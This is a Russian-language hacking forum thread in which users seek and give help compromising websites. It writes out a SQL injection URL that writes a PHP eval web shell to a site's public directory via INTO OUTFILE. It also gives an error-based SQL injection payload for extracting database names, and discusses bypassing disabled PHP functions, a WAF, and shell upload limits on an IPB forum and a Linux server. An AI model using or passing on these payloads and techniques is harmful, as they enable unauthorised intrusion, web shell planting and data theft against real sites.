Назрел тут вопрос по sql injection, ns clounfire, пытаюсь выполнить такой запрос но безрезультатно. https://site.net/index.php'+and+(SeLeCt '<?php eval(base64_decode($_REQUEST[cmd])); ?>' InTo OuTfIlE '/home/site/public_html/site.net/tester.php') Не дает выполнить из-за <? если пишу select тоже не выполнятся, написал SeLeCt выполнился, но шелл не заливается, полный путь указан верно. Есть какие мысли?
Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system как нибудь можно обойти эти ограничения?
Не могу залиться в IPB 1.3. Доступ админа есть. Пробовал через смайлы - не получилось. Пробовал sql запросом - нет прав на запись. Какие еще способы есть ?
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
попробуй так Code: ' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
Беда, с Linux 2.6.32-042stab094.8 #1 SMP Tue Dec 16 20:36:56 MSK 2014 i686 мб еще какие нибудь варианты есть? Файлы то читаются нормально, но нужно знать полный список файлов в каталоге. Шелл залит, но права нищенские все функции в Disabled. бэкконект не катит тоже.